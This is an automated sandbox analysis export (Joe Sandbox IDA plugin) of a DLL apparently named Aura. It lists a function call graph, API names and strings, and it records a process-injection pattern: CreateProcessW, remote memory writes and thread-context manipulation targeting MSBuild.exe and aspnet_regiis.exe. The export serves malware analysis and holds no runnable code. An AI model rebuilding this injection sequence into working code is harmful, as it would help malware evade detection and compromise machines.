10191->10192 10197 6cdc9c5d 10191->10197 10206 6cdc4b70 10192->10206 10194 6cdc9ca6 10195 6cdc4b70 __dosmaperr 14 API calls 10194->10195 10198 6cdc9cab 10195->10198 10197->10194 10200 6cdc9c84 10197->10200 10201 6cdc4b83 _free 14 API calls 10198->10201 10199 6cdc4b83 _free 14 API calls 10203 6cdc960f 10199->10203 10209 6cdc9bab 10200->10209 10204 6cdc9cb3 10201->10204 10203->10180 10203->10187 10205 6cdc4ac6 __fassign 25 API calls 10204->10205 10205->10203 10207 6cdc474e _free 14 API calls 10206->10207 10208 6cdc4b75 10207->10208 10208->10199 10210 6cdc9bb7 ___scrt_is_nonwritable_in_current_image 10209->10210 10220 6cdc825f EnterCriticalSection 10210->10220 10212 6cdc9bc5 10213 6cdc9bec 10212->10213 10214 6cdc9bf7 10212->10214 10221 6cdc9cc4 10213->10221 10216 6cdc4b83 _free 14 API calls 10214->10216 10217 6cdc9bf2 10216->10217 10236 6cdc9c2b 10217->10236 10220->10212 10239 6cdc8336 10221->10239 10223 6cdc9cda 10252 6cdc82a5 10223->10252 10225 6cdc9cd4 10225->10223 10226 6cdc9d0c 10225->10226 10229 6cdc8336 ___scrt_uninitialize_crt 25 API calls 10225->10229 10226->10223 10227 6cdc8336 ___scrt_uninitialize_crt 25 API calls 10226->10227 10231 6cdc9d18 CloseHandle 10227->10231 10230 6cdc9d03 10229->10230 10233 6cdc8336 ___scrt_uninitialize_crt 25 API calls 10230->10233 10231->10223 10234 6cdc9d24 GetLastError 10231->10234 10232 6cdc9d54 10232->10217 10233->10226 10234->10223 10266 6cdc8282 LeaveCriticalSection 10236->10266 10238 6cdc9c14 10238->10203 10240 6cdc8358 10239->10240 10241 6cdc8343 10239->10241 10243 6cdc4b70 __dosmaperr 14 API calls 10240->10243 10245 6cdc837d 10240->10245 10242 6cdc4b70 __dosmaperr 14 API calls 10241->10242 10244 6cdc8348 10242->10244 10246 6cdc8388 10243->10246 10247 6cdc4b83 _free 14 API calls 10244->10247 10245->10225 10248 6cdc4b83 _free 14 API calls 10246->10248 10249 6cdc8350 10247->10249 10250 6cdc8390 10248->10250 10249->10225 10251 6cdc4ac6 __fassign 25 API calls 10250->10251 10251->10249 10253 6cdc831b 10252->10253 10254 
6cdc82b4 10252->10254 10255 6cdc4b83 _free 14 API calls 10253->10255 10254->10253 10259 6cdc82de 10254->10259 10256 6cdc8320 10255->10256 10257 6cdc4b70 __dosmaperr 14 API calls 10256->10257 10258 6cdc830b 10257->10258 10258->10232 10261 6cdc4b4d 10258->10261 10259->10258 10260 6cdc8305 SetStdHandle 10259->10260 10260->10258 10262 6cdc4b70 __dosmaperr 14 API calls 10261->10262 10263 6cdc4b58 _free 10262->10263 10264 6cdc4b83 _free 14 API calls 10263->10264 10265 6cdc4b6b 10264->10265 10265->10232 10266->10238 10267->10190 10268->10170 11045 6cdc79b9 11048 6cdc764e 11045->11048 11046 6cdc1740 _ValidateLocalCookies 5 API calls 11047 6cdc765b 11046->11047 11048->11046 9868 6cdb87f0 9880 6cdb8847 __DllMainCRTStartup@12 9868->9880 9869 6cdb6750 9 API calls 9869->9880 9870 6cdbb983 NtGetContextThread 9870->9880 9871 6cdbf7bf VirtualAlloc 9871->9880 9873 6cdbe410 NtWriteVirtualMemory 9873->9880 9874 6cdc087f CloseHandle 9874->9880 9875 6cdbf068 NtSetContextThread NtResumeThread 9875->9880 9876 6cdc085b CloseHandle 9876->9880 9877 6cdbbf10 NtWriteVirtualMemory 9877->9880 9878 6cdbac4a GetConsoleWindow ShowWindow 9909 6cdb1530 9878->9909 9880->9869 9880->9870 9880->9871 9880->9873 9880->9874 9880->9875 9880->9876 9880->9877 9880->9878 9881 6cdb1530 27 API calls 9880->9881 9882 6cdbf33e CloseHandle 9880->9882 9883 6cdbb8b5 CreateProcessW 9880->9883 9884 6cdc0344 NtGetContextThread 9880->9884 9885 6cdbed4c NtCreateThreadEx 9880->9885 9886 6cdbf25b CloseHandle 9880->9886 9887 6cdbbe6f NtAllocateVirtualMemory 9880->9887 9888 6cdbcd9f NtWriteVirtualMemory 9880->9888 9890 6cdbbddc NtAllocateVirtualMemory 9880->9890 9891 6cdc08e4 VirtualAlloc 9880->9891 9892 6cdbe296 NtReadVirtualMemory 9880->9892 9893 6cdbe8fc NtWriteVirtualMemory 9880->9893 9894 6cdc00dc NtWriteVirtualMemory 9880->9894 9895 6cdbf9ed NtWriteVirtualMemory 9880->9895 9896 6cdc06f1 NtCreateThreadEx 9880->9896 9897 6cdbfce0 NtWriteVirtualMemory 9880->9897 9900 6cdbf564 9880->9900 9903 6cdbb260 VirtualAlloc 9880->9903 
9904 6cdc07ee NtSetContextThread NtResumeThread 9880->9904 9905 6cdc063a NtWriteVirtualMemory 9880->9905 9906 6cdbc4da NtWriteVirtualMemory 9880->9906 9907 6cdc043d NtWriteVirtualMemory 9880->9907 9942 6cdb1000 9880->9942 9881->9880 9882->9880 9883->9880 9884->9880 9885->9880 9886->9880 9887->9880 9938 6cdb8290 9888->9938 9890->9880 9891->9880 9892->9880 9893->9880 9894->9880 9895->9880 9896->9880 9898 6cdb8290 5 API calls 9897->9898 9899 6cdbfd46 9898->9899 9899->9880 9901 6cdc1740 _ValidateLocalCookies 5 API calls 9900->9901 9902 6cdbf56e 9901->9902 9903->9880 9904->9880 9905->9880 9906->9880 9908 6cdb8290 5 API calls 9907->9908 9908->9899 9918 6cdb1598 ___scrt_uninitialize_crt 9909->9918 9910 6cdb3472 MapViewOfFile 9910->9918 9911 6cdb3dba VirtualProtect 9911->9918 9912 6cdb2cc2 CreateFileMappingA 9912->9918 9913 6cdb2818 GetModuleFileNameA CreateFileA 9913->9918 9914 6cdb4bae K32GetModuleInformation 9914->9918 9915 6cdb4a63 VirtualProtect 9915->9918 9916 6cdb33cf CloseHandle 9916->9918 9917 6cdb48f3 CreateFileMappingA 9917->9918 9918->9910 9918->9911 9918->9912 9918->9913 9918->9914 9918->9915 9918->9916 9918->9917 9919 6cdb4b04 ___scrt_uninitialize_crt 9918->9919 9920 6cdb4540 9918->9920 9924 6cdb2745 K32GetModuleInformation 9918->9924 9925 6cdb410b VirtualProtect 9918->9925 9926 6cdb451d CloseHandle 9918->9926 9927 6cdb44d7 CloseHandle 9918->9927 9928 6cdb45e6 K32GetModuleInformation 9918->9928 9929 6cdb44fa CloseHandle 9918->9929 9930 6cdb4843 GetCurrentProcess 9918->9930 9933 6cdb4981 CloseHandle 9918->9933 9934 6cdb25c7 GetCurrentProcess 9918->9934 9937 6cdb468e CreateFileMappingA 9918->9937 9921 6cdb4b20 VirtualProtect 9919->9921 9922 6cdc1740 _ValidateLocalCookies 5 API calls 9920->9922 9921->9918 9923 6cdb454a 9922->9923 9923->9880 9924->9918 9925->9918 9926->9918 9927->9918 9928->9918 9929->9918 9931 6cdc2370 __DllMainCRTStartup@12 9930->9931 9932 6cdb4884 GetModuleHandleA 9931->9932 9932->9918 9933->9918 9946 6cdc2370 9934->9946 9937->9918 9939 
6cdb82e6 9938->9939 9940 6cdc1740 _ValidateLocalCookies 5 API calls 9939->9940 9941 6cdb87ac 9940->9941 9941->9880 9945 6cdb1057 9942->9945 9943 6cdc1740 _ValidateLocalCookies 5 API calls 9944 6cdb14e9 9943->9944 9944->9880 9945->9943 9947 6cdb2620 GetModuleHandleA 9946->9947 9947->9918 9948 6cdc6e30 9949 6cdc6e3d 9948->9949 9950 6cdc4b96 _free 14 API calls 9949->9950 9951 6cdc6e57 9950->9951 9952 6cdc4bf3 _free 14 API calls 9951->9952 9953 6cdc6e63 9952->9953 9954 6cdc4b96 _free 14 API calls 9953->9954 9958 6cdc6e89 9953->9958 9955 6cdc6e7d 9954->9955 9957 6cdc4bf3 _free 14 API calls 9955->9957 9957->9958 9959 6cdc6e95 9958->9959 9960 6cdc63c2 9958->9960 9961 6cdc61e1 _free 5 API calls 9960->9961 9962 6cdc63de 9961->9962 9963 6cdc63fc InitializeCriticalSectionAndSpinCount 9962->9963 9964 6cdc63e7 9962->9964 9963->9964 9964->9958 10874 6cdc7bf0 10877 6cdc7c07 10874->10877 10876 6cdc7c02 10878 6cdc7c29 10877->10878 10879 6cdc7c15 10877->10879 10880 6cdc7c31 10878->10880 10881 6cdc7c43 10878->10881 10882 6cdc4b83 _free 14 API calls 10879->10882 10883 6cdc4b83 _free 14 API calls 10880->10883 10886 6cdc411d __fassign 37 API calls 10881->10886 10890 6cdc7c41 10881->10890 10884 6cdc7c1a 10882->10884 10885 6cdc7c36 10883->10885 10887 6cdc4ac6 __fassign 25 API calls 10884->10887 10889 6cdc4ac6 __fassign 25 API calls 10885->10889 10886->10890 10888 6cdc7c25 10887->10888 10888->10876 10889->10890 10890->10876 11049 6cdc9db0 11052 6cdc9dce 11049->11052 11051 6cdc9dc6 11056 6cdc9dd3 11052->11056 11053 6cdca693 15 API calls 11055 6cdc9fff 11053->11055 11054 6cdc9e68 11054->11051 11055->11051 11056->11053 11056->11054 10427 6cdc9871 10428 6cdc9891 10427->10428 10431 6cdc98c8 10428->10431 10430 6cdc98bb 10432 6cdc98cf 10431->10432 10433 6cdc9930 10432->10433 10434 6cdc98ef 10432->10434 10435 6cdca657 20 API calls 10433->10435 10436 6cdca54e 10433->10436 10434->10436 10438 6cdca657 20 API calls 10434->10438 10437 6cdc997e 10435->10437 10436->10430 10437->10430 10439 6cdca57e 
10438->10439 10439->10430 11077 6cdc3b2d 11078 6cdc5b1a 47 API calls 11077->11078 11079 6cdc3b3f 11078->11079 11088 6cdc5fdb GetEnvironmentStringsW 11079->11088 11083 6cdc4bf3 _free 14 API calls 11084 6cdc3b79 11083->11084 11086 6cdc4bf3 _free 14 API calls 11087 6cdc3b4a 11086->11087 11087->11083 11089 6cdc6048 11088->11089 11090 6cdc5ff2 11088->11090 11091 6cdc3b44 11089->11091 11092 6cdc6051 FreeEnvironmentStringsW 11089->11092 11093 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 11090->11093 11091->11087 11100 6cdc3b7f 11091->11100 11092->11091 11094 6cdc600b 11093->11094 11094->11089 11095 6cdc6f6c 15 API calls 11094->11095 11096 6cdc601b 11095->11096 11097 6cdc6033 11096->11097 11098 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 11096->11098 11099 6cdc4bf3 _free 14 API calls 11097->11099 11098->11097 11099->11089 11101 6cdc3b94 11100->11101 11102 6cdc4b96 _free 14 API calls 11101->11102 11107 6cdc3bbb 11102->11107 11103 6cdc3c20 11104 6cdc4bf3 _free 14 API calls 11103->11104 11105 6cdc3b55 11104->11105 11105->11086 11106 6cdc4b96 _free 14 API calls 11106->11107 11107->11103 11107->11106 11108 6cdc3c22 11107->11108 11113 6cdc3c42 11107->11113 11115 6cdc4bf3 _free 14 API calls 11107->11115 11117 6cdc407f 11107->11117 11109 6cdc3c4f 14 API calls 11108->11109 11111 6cdc3c28 11109->11111 11112 6cdc4bf3 _free 14 API calls 11111->11112 11112->11103 11114 6cdc4ad6 __fassign 11 API calls 11113->11114 11116 6cdc3c4e 11114->11116 11115->11107 11118 6cdc408c 11117->11118 11119 6cdc409a 11117->11119 11118->11119 11124 6cdc40b1 11118->11124 11120 6cdc4b83 _free 14 API calls 11119->11120 11121 6cdc40a2 11120->11121 11122 6cdc4ac6 __fassign 25 API calls 11121->11122 11123 6cdc40ac 11122->11123 11123->11107 11124->11123 11125 6cdc4b83 _free 14 API calls 11124->11125 11125->11121 10485 6cdc3828 10486 6cdc383f 10485->10486 10496 6cdc3838 10485->10496 10487 6cdc3860 10486->10487 10488 6cdc384a 10486->10488 10509 6cdc5b1a 10487->10509 10490 6cdc4b83 _free 14 API 
calls 10488->10490 10492 6cdc384f 10490->10492 10494 6cdc4ac6 __fassign 25 API calls 10492->10494 10494->10496 10501 6cdc38c4 10503 6cdc4b83 _free 14 API calls 10501->10503 10502 6cdc38d0 10504 6cdc395e 37 API calls 10502->10504 10508 6cdc38c9 10503->10508 10506 6cdc38e8 10504->10506 10505 6cdc4bf3 _free 14 API calls 10505->10496 10507 6cdc4bf3 _free 14 API calls 10506->10507 10506->10508 10507->10508 10508->10505 10510 6cdc5b23 10509->10510 10514 6cdc3866 10509->10514 10537 6cdc46b4 10510->10537 10515 6cdc5561 GetModuleFileNameW 10514->10515 10516 6cdc5590 GetLastError 10515->10516 10517 6cdc55a1 10515->10517 10519 6cdc4b4d __dosmaperr 14 API calls 10516->10519 10792 6cdc52da 10517->10792 10521 6cdc559c 10519->10521 10523 6cdc1740 _ValidateLocalCookies 5 API calls 10521->10523 10524 6cdc3879 10523->10524 10525 6cdc395e 10524->10525 10527 6cdc3983 10525->10527 10529 6cdc39e3 10527->10529 10828 6cdc5e40 10527->10828 10528 6cdc38ae 10531 6cdc3ad2 10528->10531 10529->10528 10530 6cdc5e40 37 API calls 10529->10530 10530->10529 10532 6cdc38bb 10531->10532 10533 6cdc3ae3 10531->10533 10532->10501 10532->10502 10533->10532 10534 6cdc4b96 _free 14 API calls 10533->10534 10535 6cdc3b0c 10534->10535 10536 6cdc4bf3 _free 14 API calls 10535->10536 10536->10532 10538 6cdc46bf 10537->10538 10543 6cdc46c5 10537->10543 10539 6cdc6341 _free 6 API calls 10538->10539 10539->10543 10540 6cdc6380 _free 6 API calls 10542 6cdc46df 10540->10542 10541 6cdc46cb 10545 6cdc40d9 __fassign 37 API calls 10541->10545 10550 6cdc4744 10541->10550 10542->10541 10544 6cdc4b96 _free 14 API calls 10542->10544 10543->10540 10543->10541 10546 6cdc46ef 10544->10546 10547 6cdc474d 10545->10547 10548 6cdc470c 10546->10548 10549 6cdc46f7 10546->10549 10552 6cdc6380 _free 6 API calls 10548->10552 10551 6cdc6380 _free 6 API calls 10549->10551 10562 6cdc5966 10550->10562 10553 6cdc4703 10551->10553 10554 6cdc4718 10552->10554 10558 6cdc4bf3 _free 14 API calls 10553->10558 10555 6cdc471c 10554->10555 10556 
6cdc472b 10554->10556 10559 6cdc6380 _free 6 API calls 10555->10559 10557 6cdc43f9 _free 14 API calls 10556->10557 10560 6cdc4736 10557->10560 10558->10541 10559->10553 10561 6cdc4bf3 _free 14 API calls 10560->10561 10561->10541 10581 6cdc5a7a 10562->10581 10582 6cdc5a86 ___scrt_is_nonwritable_in_current_image 10581->10582 10583 6cdc5aa0 10582->10583 10625 6cdc488a EnterCriticalSection 10582->10625 10585 6cdc5979 10583->10585 10587 6cdc40d9 __fassign 37 API calls 10583->10587 10592 6cdc5710 10585->10592 10586 6cdc5adc 10626 6cdc5af9 10586->10626 10589 6cdc5b19 10587->10589 10590 6cdc5ab0 10590->10586 10591 6cdc4bf3 _free 14 API calls 10590->10591 10591->10586 10630 6cdc411d 10592->10630 10625->10590 10629 6cdc48d2 LeaveCriticalSection 10626->10629 10628 6cdc5b00 10628->10583 10629->10628 10631 6cdc413d 10630->10631 10632 6cdc45f7 __fassign 37 API calls 10631->10632 10633 6cdc415d 10632->10633 10637 6cdc7116 10633->10637 10638 6cdc7129 10637->10638 10639 6cdc4173 10637->10639 10638->10639 10645 6cdc7524 10638->10645 10641 6cdc7143 10639->10641 10642 6cdc716b 10641->10642 10643 6cdc7156 10641->10643 10643->10642 10663 6cdc5b62 10643->10663 10646 6cdc7530 ___scrt_is_nonwritable_in_current_image 10645->10646 10647 6cdc45f7 __fassign 37 API calls 10646->10647 10648 6cdc7539 10647->10648 10649 6cdc757f 10648->10649 10658 6cdc488a EnterCriticalSection 10648->10658 10649->10639 10651 6cdc7557 10652 6cdc75a5 __fassign 14 API calls 10651->10652 10653 6cdc7568 10652->10653 10659 6cdc7584 10653->10659 10656 6cdc40d9 __fassign 37 API calls 10657 6cdc75a4 10656->10657 10658->10651 10662 6cdc48d2 LeaveCriticalSection 10659->10662 10661 6cdc757b 10661->10649 10661->10656 10662->10661 10664 6cdc45f7 __fassign 37 API calls 10663->10664 10665 6cdc5b6c 10664->10665 10666 6cdc5a7a __fassign 37 API calls 10665->10666 10667 6cdc5b72 10666->10667 10667->10642 10793 6cdc411d __fassign 37 API calls 10792->10793 10794 6cdc52ec 10793->10794 10795 6cdc52fe 10794->10795 10818 6cdc62a4 
10794->10818 10797 6cdc545f 10795->10797 10798 6cdc546c 10797->10798 10799 6cdc547b 10797->10799 10798->10521 10800 6cdc54a8 10799->10800 10801 6cdc5483 10799->10801 10802 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10800->10802 10801->10798 10824 6cdc5526 10801->10824 10804 6cdc54b8 10802->10804 10805 6cdc54bf GetLastError 10804->10805 10806 6cdc54d5 10804->10806 10807 6cdc4b4d __dosmaperr 14 API calls 10805->10807 10808 6cdc54e6 10806->10808 10811 6cdc5526 14 API calls 10806->10811 10810 6cdc54cb 10807->10810 10808->10798 10809 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10808->10809 10812 6cdc54fe 10809->10812 10813 6cdc4b83 _free 14 API calls 10810->10813 10811->10808 10812->10798 10814 6cdc5505 GetLastError 10812->10814 10813->10798 10815 6cdc4b4d __dosmaperr 14 API calls 10814->10815 10816 6cdc5511 10815->10816 10817 6cdc4b83 _free 14 API calls 10816->10817 10817->10798 10821 6cdc60cc 10818->10821 10822 6cdc61e1 _free 5 API calls 10821->10822 10823 6cdc60e2 10822->10823 10823->10795 10825 6cdc5531 10824->10825 10826 6cdc4b83 _free 14 API calls 10825->10826 10827 6cdc553a 10826->10827 10827->10798 10831 6cdc5de9 10828->10831 10832 6cdc411d __fassign 37 API calls 10831->10832 10833 6cdc5dfd 10832->10833 10833->10527 10891 6cdc7fea 10892 6cdc5b1a 47 API calls 10891->10892 10893 6cdc7fef 10892->10893 11126 6cdc3f24 11127 6cdc4bf3 _free 14 API calls 11126->11127 11128 6cdc3f32 11127->11128 11129 6cdc4bf3 _free 14 API calls 11128->11129 11130 6cdc3f45 11129->11130 11131 6cdc4bf3 _free 14 API calls 11130->11131 11132 6cdc3f56 11131->11132 11133 6cdc4bf3 _free 14 API calls 11132->11133 11134 6cdc3f67 11133->11134 10408 6cdc3ca7 10409 6cdc3cb9 10408->10409 10410 6cdc3cbf 10408->10410 10411 6cdc3c4f 14 API calls 10409->10411 10411->10410 10269 6cdc66e1 10270 6cdc66e6 10269->10270 10272 6cdc6709 10270->10272 10273 6cdc818c 10270->10273 10274 6cdc8199 10273->10274 10278 6cdc81bb 10273->10278 10275 6cdc81b5 10274->10275 10276 6cdc81a7 
DeleteCriticalSection 10274->10276 10277 6cdc4bf3 _free 14 API calls 10275->10277 10276->10275 10276->10276 10277->10278 10278->10270 10834 6cdc1a23 ___scrt_dllmain_exception_filter 10894 6cdc4de3 10895 6cdc4df3 10894->10895 10904 6cdc4e07 10894->10904 10896 6cdc4b83 _free 14 API calls 10895->10896 10897 6cdc4df8 10896->10897 10898 6cdc4ac6 __fassign 25 API calls 10897->10898 10900 6cdc4e02 10898->10900 10899 6cdc3ad2 14 API calls 10906 6cdc4ee3 10899->10906 10901 6cdc4e7e 10901->10899 10901->10901 10903 6cdc4eec 10905 6cdc4bf3 _free 14 API calls 10903->10905 10904->10901 10909 6cdc4ef7 10904->10909 10915 6cdc4fd2 10904->10915 10905->10909 10906->10903 10911 6cdc4fc7 10906->10911 10933 6cdc7ba1 10906->10933 10908 6cdc4fb3 10910 6cdc4bf3 _free 14 API calls 10908->10910 10909->10908 10912 6cdc4bf3 _free 14 API calls 10909->10912 10910->10900 10913 6cdc4ad6 __fassign 11 API calls 10911->10913 10912->10909 10914 6cdc4fd1 10913->10914 10916 6cdc4fde 10915->10916 10916->10916 10917 6cdc4b96 _free 14 API calls 10916->10917 10918 6cdc500c 10917->10918 10919 6cdc7ba1 25 API calls 10918->10919 10920 6cdc5038 10919->10920 10921 6cdc4ad6 __fassign 11 API calls 10920->10921 10922 6cdc5082 10921->10922 10923 6cdc52da 37 API calls 10922->10923 10924 6cdc514a 10923->10924 10942 6cdc4dc6 10924->10942 10927 6cdc5198 10928 6cdc52da 37 API calls 10927->10928 10929 6cdc51d5 10928->10929 10945 6cdc4cf7 10929->10945 10932 6cdc4fd2 43 API calls 10936 6cdc7aee 10933->10936 10934 6cdc7b06 10935 6cdc4b83 _free 14 API calls 10934->10935 10937 6cdc7b1a 10934->10937 10941 6cdc7b10 10935->10941 10936->10934 10936->10937 10939 6cdc7b3e 10936->10939 10937->10906 10938 6cdc4ac6 __fassign 25 API calls 10938->10937 10939->10937 10940 6cdc4b83 _free 14 API calls 10939->10940 10940->10941 10941->10938 10968 6cdc4c45 10942->10968 10946 6cdc4d05 10945->10946 10947 6cdc4d21 10945->10947 10948 6cdc5319 14 API calls 10946->10948 10949 6cdc4d48 10947->10949 10950 6cdc4d28 10947->10950 10963 6cdc4d0f 
10948->10963 10951 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10949->10951 10950->10963 10998 6cdc5333 10950->10998 10953 6cdc4d58 10951->10953 10954 6cdc4d5f GetLastError 10953->10954 10955 6cdc4d75 10953->10955 10956 6cdc4b4d __dosmaperr 14 API calls 10954->10956 10957 6cdc4d86 10955->10957 10960 6cdc5333 15 API calls 10955->10960 10959 6cdc4d6b 10956->10959 10958 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10957->10958 10957->10963 10961 6cdc4d9e 10958->10961 10962 6cdc4b83 _free 14 API calls 10959->10962 10960->10957 10961->10963 10964 6cdc4da5 GetLastError 10961->10964 10962->10963 10963->10932 10965 6cdc4b4d __dosmaperr 14 API calls 10964->10965 10966 6cdc4db1 10965->10966 10967 6cdc4b83 _free 14 API calls 10966->10967 10967->10963 10969 6cdc4c6d 10968->10969 10970 6cdc4c53 10968->10970 10971 6cdc4c74 10969->10971 10972 6cdc4c93 10969->10972 10986 6cdc5319 10970->10986 10985 6cdc4c5d FindFirstFileExW 10971->10985 10990 6cdc536f 10971->10990 10974 6cdc5e71 __fassign MultiByteToWideChar 10972->10974 10976 6cdc4ca2 10974->10976 10977 6cdc4ca9 GetLastError 10976->10977 10979 6cdc4ccf 10976->10979 10980 6cdc536f 15 API calls 10976->10980 10978 6cdc4b4d __dosmaperr 14 API calls 10977->10978 10982 6cdc4cb5 10978->10982 10981 6cdc5e71 __fassign MultiByteToWideChar 10979->10981 10979->10985 10980->10979 10983 6cdc4ce6 10981->10983 10984 6cdc4b83 _free 14 API calls 10982->10984 10983->10977 10983->10985 10984->10985 10985->10927 10987 6cdc5324 10986->10987 10988 6cdc532c 10986->10988 10989 6cdc4bf3 _free 14 API calls 10987->10989 10988->10985 10989->10988 10991 6cdc5319 14 API calls 10990->10991 10992 6cdc537d 10991->10992 10995 6cdc53ae 10992->10995 10996 6cdc6f6c 15 API calls 10995->10996 10997 6cdc538e 10996->10997 10997->10985 10999 6cdc5319 14 API calls 10998->10999 11000 6cdc5341 10999->11000 11001 6cdc53ae 15 API calls 11000->11001 11002 6cdc534f 11001->11002 11002->10963
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Virtual$Memory$Write$Thread$CloseHandle$AllocContextCreate$AllocateResumeWindow$ConsoleProcessReadShow
                                                • String ID: I`$#N[#$@$@9H$@9H$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$G/Q$MZx$X$yk$kernel32.dll$ntdll.dll$o<x"$o<x"$}q[$}q[$`\;$wmE$wmE
                                                • API String ID: 1269680361-766751286
                                                • Opcode ID: cfefca03e795d1c00a79a3f7b8a9da2e274a1e8968798a654482c6bc1ad7d6f1
                                                • Instruction ID: 1302b503ad88bfc5aa1db40f669900b46d5dc2fe9e315643b700f5f72532e898
                                                • Opcode Fuzzy Hash: cfefca03e795d1c00a79a3f7b8a9da2e274a1e8968798a654482c6bc1ad7d6f1
                                                • Instruction Fuzzy Hash: 41E311B6B412508FDF088F2CCD947CA77F2AB46350F144699D45AEB7B4C63A9E89CB01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Handle$Module$CloseFile$CreateInformationProtectVirtual$CurrentMappingProcess$NameView
                                                • String ID: +sw9$@$gHg1$gHg1$t#$6$6
                                                • API String ID: 3418435400-895042186
                                                • Opcode ID: f20a37381f7c52da87d39a00313cdb0d032d387940622b55e7d25513cce206c8
                                                • Instruction ID: 867e41ab50d218a78bc62e293994c940be3527a555869a36789c0ebb85182f42
                                                • Opcode Fuzzy Hash: f20a37381f7c52da87d39a00313cdb0d032d387940622b55e7d25513cce206c8
                                                • Instruction Fuzzy Hash: E853FEB6B402108FDB14CF3CC9957CA77F2AB86364F108259D856EB7A5C73A9E498F01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: NtQueryInformationProcess$ntdll.dll$u\|{
                                                • API String ID: 4139908857-3994497579
                                                • Opcode ID: b2ac7141523aa29eeeb9fc5e452d75e4a39dcd0b3ca3363bbd1a2912f5564449
                                                • Instruction ID: 2f6276983e9c2ee449971df5d54b0fedeabb1732bee76f43741658ffa5ba7211
                                                • Opcode Fuzzy Hash: b2ac7141523aa29eeeb9fc5e452d75e4a39dcd0b3ca3363bbd1a2912f5564449
                                                • Instruction Fuzzy Hash: AFE216B6A445018FDF08CFBCC9D53DE7BF2AF46325F155219D462EB7A5C63A890A8B00

                                                Control-flow Graph (graph image not reproduced; executed and not-executed blocks were colour-coded in the original rendering)
                                                APIs
                                                • __RTC_Initialize.LIBCMT ref: 6CDC18EF
                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6CDC1909
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Initialize___scrt_uninitialize_crt
                                                • String ID:
                                                • API String ID: 2442719207-0
                                                • Opcode ID: 81bdcb6c54e075f4d67c2939bb12cdef0a526dd76c857dbb3c392329be2b726a
                                                • Instruction ID: 2b54f7967ab9a4b37ad97c8ccb66fd9d0f4e0325058cccacd3b6805182aba626
                                                • Opcode Fuzzy Hash: 81bdcb6c54e075f4d67c2939bb12cdef0a526dd76c857dbb3c392329be2b726a
                                                • Instruction Fuzzy Hash: 0341A672F05279EEDB108F95C840B9E7ABCEF457A8F114216E815A7B70C734C9069BA2

                                                Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                • String ID:
                                                • API String ID: 3136044242-0
